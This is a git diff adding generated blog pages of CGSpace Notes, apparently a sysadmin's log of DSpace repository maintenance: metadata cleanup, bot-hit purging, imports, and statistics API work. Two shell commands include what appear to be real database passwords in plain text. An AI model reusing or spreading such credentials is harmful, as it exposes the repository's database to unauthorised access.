+WEST ASIA,WESTERN ASIA
+SOUTHWEST ASIA,SOUTHWESTERN ASIA
+$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d -n
+Connected to database.
+Would fix 12227 occurences of: EAST AFRICA
+Would fix 7996 occurences of: WEST AFRICA
+Would fix 3515 occurences of: SOUTHEAST ASIA
+Would fix 3443 occurences of: SOUTH ASIA
+Would fix 1134 occurences of: AFRICA SOUTH OF SAHARA
+Would fix 357 occurences of: NORTH AFRICA
+Would fix 81 occurences of: WEST ASIA
+Would fix 3 occurences of: SOUTHWEST ASIA
+</code></pre><ul>
+<li>I think we need to wait for the web team, though, as they need to update their mappings
+<ul>
+<li>Not to mention that we&rsquo;ll need to give WLE and CCAFS time to update their harvesters as well&hellip; hmmm</li>
+</ul>
+</li>
+<li>Looking at the top user agents active on CGSpace in 2020-08 and I see:
+<ul>
+<li><code>Delphi 2009</code>: 235353 (this is GARDIAN harvester I guess, as the IP is in Greece)</li>
+<li><code>Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)</code>: 57004 (IP is 18.196.100.94, and the requests seem to be for CTA&rsquo;s content)</li>
+<li><code>RTB website BOT</code>: 12282</li>
+<li><code>ILRI Livestock Website Publications importer BOT</code>: 9393</li>
+</ul>
+</li>
+<li>Shit, I meant to add Delphi to the DSpace spider agents list last month but I guess I didn&rsquo;t commit the change</li>
+<li>HTTrack is in the agents list so I&rsquo;m not sure why DSpace registers a hit from that request</li>
+<li>Also, I am surprised to see the RTB and ILRI bots here because they have &ldquo;BOT&rdquo; in the name and that should also be dropped</li>
+<li>I also see hits from <code>curl</code> and <code>Java/1.8.0_66</code> and <code>Apache-HttpClient</code> so WTF&hellip; those are supposed to be dropped by the default agents list</li>
+<li>Some IP <code>2607:f298:5:101d:f816:3eff:fed9:a484</code> made 9,000 requests with the <code>RI/1.0</code> user agent this year&hellip;
+<ul>
+<li>That&rsquo;s on DreamHost&hellip;?</li>
+</ul>
+</li>
+<li>I purged 448658 hits from these agents and added <code>Delphi</code> to our local agents overload for Solr as well as Tomcat&rsquo;s Crawler Session Manager Valve so that it forces them to re-use a single session</li>
+<li>I made a pull request on the COUNTER-Robots project for the Daum robot: <a href="https://github.com/atmire/COUNTER-Robots/pull/38">https://github.com/atmire/COUNTER-Robots/pull/38</a>
+<ul>
+<li>This bot made 8,000 requests to CGSpace this year</li>
+<li>I purged about 20,000 total requests from this bot from our Solr stats for the last few years</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-11">2020-09-11</h2>
+<ul>
+<li>Peter noticed that an export from AReS shows some items with zero views and others with zero views/downloads, but on CGSpace and in the statistics API there are views/downloads
+<ul>
+<li>I need to ask Moayad&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-12">2020-09-12</h2>
+<ul>
+<li>Carlos Tejo from the LandPortal emailed to ask for advice about integrating their <a href="https://landvoc.org/">LandVoc</a> vocabulary, which is a subset of AGROVOC, into DSpace
+<ul>
+<li>I told him that they could use the DSpace authority control framework and sent an example of the VIAFAuthority from the DSpace-CRIS project: <a href="https://github.com/4Science/DSpace/blob/dspace-6_x_x-cris/dspace-api/src/main/java/org/dspace/content/authority/VIAFAuthority.java">https://github.com/4Science/DSpace/blob/dspace-6_x_x-cris/dspace-api/src/main/java/org/dspace/content/authority/VIAFAuthority.java</a></li>
+</ul>
+</li>
+<li>Redeploy the latest <code>5_x-prod</code> branch on CGSpace, re-run the latest Ansible DSpace playbook, run all system updates, and reboot the server (linode18)
+<ul>
+<li>This will bring the latest bot lists for Solr and Tomcat</li>
+<li>I had to restart Tomcat 7 three times before all Solr statistics cores came up OK</li>
+</ul>
+</li>
+<li>Leroy and Carol from CIAT/Bioversity were asking for information about posting to the CGSpace REST API from Sharepoint
+<ul>
+<li>I told them that we don&rsquo;t allow this yet, but that we need to check in the future whether content can be posted to a workflow</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-15">2020-09-15</h2>
+<ul>
+<li>Charlotte from Altmetric said they had issues parsing the XML file I sent them last month
+<ul>
+<li>I told them that it was mimicking the same format that they had sent me (fourteen pages of XML responses concatenated together)!</li>
+</ul>
+</li>
+<li>A few days ago IWMI asked us if we can add a new field on CGSpace for their library identifier
+<ul>
+<li>The IDs look like this: H049940</li>
+<li>I suggested that we use <code>cg.identifier.iwmilibrary</code></li>
+<li>I added it to the input forms and push it to the <code>5_x-prod</code> and 6.x branches and will re-deploy it in the next few days</li>
+</ul>
+</li>
+<li>Abenet asked me to import sixty-nine (69) CIP Annual Reports to CGSpace
+<ul>
+<li>I looked at the data in OpenRefine and it is very good quality</li>
+<li>I only added descriptions to the filename field so that SAFBuilder will add them to the bitstreams on import:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
+</code></pre><ul>
+<li>Then I created a SAF bundle with SAFBuilder:</li>
+</ul>
+<pre tabindex="0"><code>$ ./safbuilder.sh -c ~/Downloads/cip-annual-reports/cip-reports.csv
+</code></pre><ul>
+<li>And imported them into my local test instance of CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -e y.arrr@cgiar.org -m /tmp/2020-09-15-cip-annual-reports.map -s ~/Downloads/cip-annual-reports/SimpleArchiveFormat
+</code></pre><ul>
+<li>Then I uploaded them to CGSpace</li>
+</ul>
+<h2 id="2020-09-16">2020-09-16</h2>
+<ul>
+<li>Looking further into Carlos Tejos&rsquo;s question about integrating LandVoc (the AGROVOC subset) into DSpace
+<ul>
+<li>I see that you can actually get LandVoc concepts directly from AGROVOC&rsquo;s SPARQL, for example with <a href="http://agrovoc.uniroma2.it/sparql#query=PREFIX+rdfs%3A+%3Chttp%3A%2F%2Fwww.w3.org%2F2000%2F01%2Frdf-schema%23%3E%0APREFIX+skos%3A+%3Chttp%3A%2F%2Fwww.w3.org%2F2004%2F02%2Fskos%2Fcore%23%3E%0A%0ASELECT+%3Fconcept%0AWHERE+%7B%0A++%3Fconcept+a+skos%3AConcept+%3B%0A+++++++++++skos%3AinScheme+%3Chttp%3A%2F%2Flandvoc.org%2Flandvoc%3E+.%0A%0A%7D+ORDER+BY+%3Fconcept&amp;contentTypeConstruct=text%2Fturtle&amp;contentTypeSelect=application%2Fsparql-results%2Bjson&amp;endpoint=http%3A%2F%2Fagrovoc.uniroma2.it%2Fsparql&amp;requestMethod=POST&amp;tabTitle=Query&amp;headers=%7B%7D&amp;outputFormat=table">this query</a></li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/agrovoc-landvoc-sparql.png" alt="AGROVOC LandVoc SPARQL"></p>
+<ul>
+<li>So maybe we can query AGROVOC directly using a similar method to <a href="https://github.com/4Science/DSpace/blob/dspace-5_x_x-cris/dspace-api/src/main/java/org/dspace/content/authority/TGNAuthority.java">DSpace-CRIS&rsquo;s GettyAuthority</a></li>
+<li>I wired up DSpace-CRIS&rsquo;s VIAFAuthority to see how authorities for auto suggested names get stored
+<ul>
+<li>After submission you can see the item&rsquo;s VIAF identifier:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/viaf-authority.png" alt="VIAF authority"></p>
+<ul>
+<li>And this identifier is the ID on VIAF, pretty cool!</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/viaf-darwin.png" alt="VIAF entry for Charles Darwin"></p>
+<ul>
+<li>I did a similar test with the Getty Thesaurus of Geographic Names (TGN) and it stores the concept URI in the authority:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/tgn-concept-uri.png" alt="TGNAuthority"></p>
+<ul>
+<li>But the authority values are not exposed anywhere as metadata&hellip;
+<ul>
+<li>I need to play with it a bit more I guess&hellip;</li>
+</ul>
+</li>
+<li>The nice thing is that the Getty example from DSpace-CRIS uses SPARQL as well, and the TGN authority extends it
+<ul>
+<li>We could use a similar model for AGROVOC/LandVoc very easily</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-17">2020-09-17</h2>
+<ul>
+<li>Maria from Bioveristy asked about the ORCID identifier for one of her colleagues that seems to have been removed from our list
+<ul>
+<li>I re-added it to our controlled vocabulary and added the identifier to fifty-one of his existing items on CGSpace using my script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-09-17-add-bioversity-orcids.csv
+dc.contributor.author,cg.creator.id
+&#34;Etten, Jacob van&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
+&#34;van Etten, Jacob&#34;,&#34;Jacob van Etten: 0000-0001-7554-2558&#34;
+$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p &#39;dom@in34sniper&#39;
+</code></pre><ul>
+<li>I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade
+<ul>
+<li>First is the fact that we have zero results in our Listings and Reports, for any search</li>
+<li>Second is the error we get during CSV imports</li>
+</ul>
+</li>
+<li>Help Natalia and Cathy from Bioversity-CIAT with their OpenSearch query on &ldquo;trade offs&rdquo; again
+<ul>
+<li>They wanted to build a search query with multiple filters (type, crpsubject, status) and the general query &ldquo;trade offs&rdquo;</li>
+<li>I found a great <a href="https://www.kiwi.fi/pages/viewpage.action?pageId=45782169">reference for DSpace&rsquo;s OpenSearch syntax</a> (albeit in Finnish, but the example URLs show the syntax clearly)</li>
+<li>We can use quotes and <code>AND</code> and <code>OR</code> and even group search parameters with parenthesis!</li>
+<li>So now I built a query for Natalia which uses these (showing without URL encoding so you can see the syntax):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>https://cgspace.cgiar.org/open-search/discover?query=type:&#34;Journal Article&#34; AND status:&#34;Open Access&#34; AND crpsubject:&#34;Water, Land and Ecosystems&#34; AND &#34;tradeoffs&#34;&amp;rpp=100
+</code></pre><ul>
+<li>I noticed that my <code>move-collections.sh</code> script didn&rsquo;t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection <code>resource_id</code> parameters in the PostgreSQL query</li>
+</ul>
+<h2 id="2020-09-18">2020-09-18</h2>
+<ul>
+<li>Help Natalia with her WLE &ldquo;tradeoffs&rdquo; search query again&hellip;</li>
+</ul>
+<h2 id="2020-09-20">2020-09-20</h2>
+<ul>
+<li>Deploy latest 5_x-prod branch on CGSpace, run all system updates, and reboot the server
+<ul>
+<li>To my great surprise, all the Solr statistics cores came up correctly after reboot</li>
+</ul>
+</li>
+<li>Deploy latest 6_x-dev branch on DSpace Test, run all system updates and reboot the server</li>
+</ul>
+<h2 id="2020-09-22">2020-09-22</h2>
+<ul>
+<li>Abenet sent some feedback about AReS
+<ul>
+<li>The item views and downloads are still incorrect</li>
+<li>I looked in the server&rsquo;s API logs and there are no errors, and the database has many more views/downloads:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspacestatistics=# SELECT SUM(views) FROM items;
+   sum
+----------
+ 15714024
+(1 row)
+
+dspacestatistics=# SELECT SUM(downloads) FROM items;
+   sum
+----------
+ 13979911
+(1 row)
+</code></pre><ul>
+<li>I deleted &ldquo;Report&rdquo; from twelve items that had it in their peer review field:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# BEGIN;
+BEGIN
+dspace=# DELETE FROM metadatavalue WHERE text_value=&#39;Report&#39; AND resource_type_id=2 AND metadata_field_id=68;
+DELETE 12
+dspace=# COMMIT;
+</code></pre><ul>
+<li>I added all CG center- and CRP-specific subject fields and mapped them to <code>dc.subject</code> in AReS</li>
+<li>After forcing a re-harvesting now the review status is much cleaner and the missing subjects are available</li>
+<li>Last week Natalia from CIAT had asked me to download all the PDFs for a certain query:
+<ul>
+<li>items with status &ldquo;Open Access&rdquo;</li>
+<li>items with type &ldquo;Journal Article&rdquo;</li>
+<li>items containing any of the following words: water land and ecosystems &amp; trade offs</li>
+<li>The resulting OpenSearch query is: <a href="https://cgspace.cgiar.org/open-search/discover?query=type:%22Journal">https://cgspace.cgiar.org/open-search/discover?query=type:&quot;Journal</a> Article&quot; AND status:&ldquo;Open Access&rdquo; AND Water Land Ecosystems trade offs&amp;rpp=1</li>
+<li>There were 241 results with a total of 208 PDFs, which I downloaded with my <code>get-wle-pdfs.py</code> script and shared to her via bashupload.com</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-23">2020-09-23</h2>
+<ul>
+<li>Peter said he was having problems submitting items to CGSpace
+<ul>
+<li>On a hunch I looked at the PostgreSQL locks in Munin and indeed the normal issue with locks is back (though I haven&rsquo;t seen it in a few months?)</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/09/postgres_connections_ALL-day.png" alt="PostgreSQL connections day"></p>
+<ul>
+<li>Instead of restarting Tomcat I restarted the PostgreSQL service and then Peter said he was able to submit the item&hellip;</li>
+<li>Experiment with doing direct queries for items in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a>
+<ul>
+<li>I tested querying a handful of item UUIDs with a date range and returning their hits faceted by <code>id</code></li>
+<li>Assuming a list of item UUIDs was posted to the REST API we could prepare them for a Solr query by joining them into a string with &ldquo;OR&rdquo; and escaping the hyphens:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>...
+item_ids = [&#39;0079470a-87a1-4373-beb1-b16e3f0c4d81&#39;, &#39;007a9df1-0871-4612-8b28-5335982198cb&#39;]
+item_ids_str = &#39; OR &#39;.join(item_ids).replace(&#39;-&#39;, &#39;\-&#39;)
+...
+solr_query_params = {
+    &#34;q&#34;: f&#34;id:({item_ids_str})&#34;,
+    &#34;fq&#34;: &#34;type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]&#34;,
+    &#34;facet&#34;: &#34;true&#34;,
+    &#34;facet.field&#34;: &#34;id&#34;,
+    &#34;facet.mincount&#34;: 1,
+    &#34;facet.limit&#34;: 1,
+    &#34;facet.offset&#34;: 0,
+    &#34;stats&#34;: &#34;true&#34;,
+    &#34;stats.field&#34;: &#34;id&#34;,
+    &#34;stats.calcdistinct&#34;: &#34;true&#34;,
+    &#34;shards&#34;: shards,
+    &#34;rows&#34;: 0,
+    &#34;wt&#34;: &#34;json&#34;,
+}
+</code></pre><ul>
+<li>The date range format for Solr is important, but it seems we only need to add <code>T00:00:00Z</code> to the normal ISO 8601 YYYY-MM-DD strings</li>
+</ul>
+<h2 id="2020-09-25">2020-09-25</h2>
+<ul>
+<li>I did some more work on the dspace-statistics-api and finalized the support for sending a POST to <code>/items</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
+{
+   &#34;currentPage&#34; : 0,
+   &#34;limit&#34; : 10,
+   &#34;statistics&#34; : [
+      {
+         &#34;downloads&#34; : 3329,
+         &#34;id&#34; : &#34;b2c1bbfd-65b0-438c-9e49-d271c49b2696&#34;,
+         &#34;views&#34; : 1565
+      },
+      {
+         &#34;downloads&#34; : 3797,
+         &#34;id&#34; : &#34;f44cf173-2344-4eb2-8f00-ee55df32c76f&#34;,
+         &#34;views&#34; : 48
+      },
+      {
+         &#34;downloads&#34; : 11064,
+         &#34;id&#34; : &#34;8542f9da-9ce1-4614-abf4-f2e3fdb4b305&#34;,
+         &#34;views&#34; : 26
+      },
+      {
+         &#34;downloads&#34; : 6782,
+         &#34;id&#34; : &#34;2324aa41-e9de-4a2b-bc36-16241464683e&#34;,
+         &#34;views&#34; : 19
+      },
+      {
+         &#34;downloads&#34; : 48,
+         &#34;id&#34; : &#34;0fe573e7-042a-4240-a4d9-753b61233908&#34;,
+         &#34;views&#34; : 12
+      },
+      {
+         &#34;downloads&#34; : 0,
+         &#34;id&#34; : &#34;000e61ca-695d-43e5-9ab8-1f3fd7a67a32&#34;,
+         &#34;views&#34; : 4
+      },
+      {
+         &#34;downloads&#34; : 0,
+         &#34;id&#34; : &#34;000dc7cd-9485-424b-8ecf-78002613cc87&#34;,
+         &#34;views&#34; : 1
+      },
+      {
+         &#34;downloads&#34; : 0,
+         &#34;id&#34; : &#34;000e1616-3901-4431-80b1-c6bc67312d8c&#34;,
+         &#34;views&#34; : 1
+      },
+      {
+         &#34;downloads&#34; : 0,
+         &#34;id&#34; : &#34;000ea897-5557-49c7-9f54-9fa192c0f83b&#34;,
+         &#34;views&#34; : 1
+      },
+      {
+         &#34;downloads&#34; : 0,
+         &#34;id&#34; : &#34;000ec427-97e5-4766-85a5-e8dd62199ab5&#34;,
+         &#34;views&#34; : 1
+      }
+   ],
+   &#34;totalPages&#34; : 13
+}
+</code></pre><ul>
+<li>I deployed it on DSpace Test and sent a note to Salem so he can test it</li>
+<li>I still need to add tests&hellip;</li>
+<li>After that I will probably tag it as version 1.3.0</li>
+</ul>
+<h2 id="2020-09-25-1">2020-09-25</h2>
+<ul>
+<li>Atmire responded with some notes about the issues we&rsquo;re having with CUA and L&amp;R on DSpace Test
+<ul>
+<li>They think they have found the reason the issues are happening&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-29">2020-09-29</h2>
+<ul>
+<li>Atmire sent a pull request yesterday with a potential fix for the Listings and Reports (L&amp;R) issue
+<ul>
+<li>I tried to build it on DSpace Test but I got an HTTP 401 Unauthorized for the artifact</li>
+<li>I sent them a message&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-09-30">2020-09-30</h2>
+<ul>
+<li>Experiment with re-creating IWMI&rsquo;s &ldquo;Monthly Abstract&rdquo; type report with an AReS template
+<ul>
+<li>The template library for reports is: <a href="https://docxtemplater.com">https://docxtemplater.com</a></li>
+<li>Conditions start with a pound and end with a slash: {#items} {/items}</li>
+<li>An inverted section begins with a caret (hat) and ends with a slash: {^citation} No citation{/citation}</li>
+<li>I found a bug: templates with a space in the file name don&rsquo;t download</li>
+<li>It would be nice if we could use <a href="https://docxtemplater.readthedocs.io/en/latest/angular_parse.html">angular expressions</a> to make more complex templates
+<ul>
+<li>Ability to iterate over authors (to change the separator)</li>
+<li>Ability to get item number in a loop (for a list)</li>
+<li>To do things like checking if a CRP is &ldquo;WLE&rdquo;</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-10/index.html b/docs/2020-10/index.html
new file mode 100644
index 000000000..6f7b98dc2
--- /dev/null
+++ b/docs/2020-10/index.html
@@ -0,0 +1,1295 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2020" />
+<meta property="og:description" content="2020-10-06
+
+Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api
+
+It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available
+Tag and release version 1.3.0 on GitHub: https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0
+
+
+Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+
+During the FlywayDB migration I got an error:
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-10/" />
+<meta property="article:published_time" content="2020-10-06T16:55:54+03:00" />
+<meta property="article:modified_time" content="2020-11-16T10:53:45+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2020"/>
+<meta name="twitter:description" content="2020-10-06
+
+Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api
+
+It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available
+Tag and release version 1.3.0 on GitHub: https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0
+
+
+Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+
+During the FlywayDB migration I got an error:
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-10/",
+  "wordCount": "6709",
+  "datePublished": "2020-10-06T16:55:54+03:00",
+  "dateModified": "2020-11-16T10:53:45+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-10/">
+
+    <title>October, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-10/">October, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-10-06T16:55:54+03:00">Tue Oct 06, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-10-06">2020-10-06</h2>
+<ul>
+<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a>
+<ul>
+<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li>
+<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li>
+</ul>
+</li>
+<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+<ul>
+<li>During the FlywayDB migration I got an error:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description=&#39;Electronic publishing&#39;, internal=&#39;FALSE&#39;, mimetype=&#39;application/epub+zip&#39;, short_description=&#39;EPUB&#39;, support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
+  Detail: Key (short_description)=(EPUB) already exists.  Call getNextException to see other errors in the batch.
+2020-10-06 21:36:04,138 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
+2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint &#34;bitstreamformatregistry_short_description_key&#34;
+  Detail: Key (short_description)=(EPUB) already exists.
+2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
+2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
+org.hibernate.exception.ConstraintViolationException: could not execute batch
+	at org.hibernate.exception.internal.SQLStateConversionDelegate.convert(SQLStateConversionDelegate.java:129)
+	at org.hibernate.exception.internal.StandardSQLExceptionConverter.convert(StandardSQLExceptionConverter.java:49)
+	at org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:124)
+	at org.hibernate.engine.jdbc.batch.internal.BatchingBatch.performExecution(BatchingBatch.java:122)
+	at org.hibernate.engine.jdbc.batch.internal.BatchingBatch.doExecuteBatch(BatchingBatch.java:101)
+	at org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl.execute(AbstractBatchImpl.java:161)
+	at org.hibernate.engine.jdbc.internal.JdbcCoordinatorImpl.executeBatch(JdbcCoordinatorImpl.java:207)
+	at org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:390)
+	at org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:304)
+	at org.hibernate.event.internal.AbstractFlushingEventListener.performExecutions(AbstractFlushingEventListener.java:349)
+	at org.hibernate.event.internal.DefaultFlushEventListener.onFlush(DefaultFlushEventListener.java:56)
+	at org.hibernate.internal.SessionImpl.flush(SessionImpl.java:1195)
+	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.hibernate.context.internal.ThreadLocalSessionContext$TransactionProtectionWrapper.invoke(ThreadLocalSessionContext.java:352)
+	at com.sun.proxy.$Proxy162.flush(Unknown Source)
+	at org.dspace.core.HibernateDBConnection.commit(HibernateDBConnection.java:83)
+	at org.dspace.core.Context.commit(Context.java:435)
+	at org.dspace.core.Context.complete(Context.java:380)
+	at org.dspace.administer.MetadataImporter.loadRegistry(MetadataImporter.java:164)
+	at org.dspace.storage.rdbms.DatabaseRegistryUpdater.updateRegistries(DatabaseRegistryUpdater.java:72)
+	at org.dspace.storage.rdbms.DatabaseRegistryUpdater.afterMigrate(DatabaseRegistryUpdater.java:121)
+	at org.flywaydb.core.internal.command.DbMigrate$3.doInTransaction(DbMigrate.java:250)
+	at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+	at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:246)
+	at org.flywaydb.core.Flyway$1.execute(Flyway.java:959)
+	at org.flywaydb.core.Flyway$1.execute(Flyway.java:917)
+	at org.flywaydb.core.Flyway.execute(Flyway.java:1373)
+	at org.flywaydb.core.Flyway.migrate(Flyway.java:917)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:663)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:575)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:551)
+	at org.dspace.core.Context.&lt;clinit&gt;(Context.java:103)
+	at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
+	at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
+	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5197)
+	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5720)
+	at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
+	at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:1016)
+	at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:992)
+</code></pre><ul>
+<li>I checked the database migrations with <code>dspace database info</code> and they were all OK
+<ul>
+<li>Then I restarted the Tomcat again and it started up OK&hellip;</li>
+</ul>
+</li>
+<li>There were two issues I had reported to Atmire last month:
+<ul>
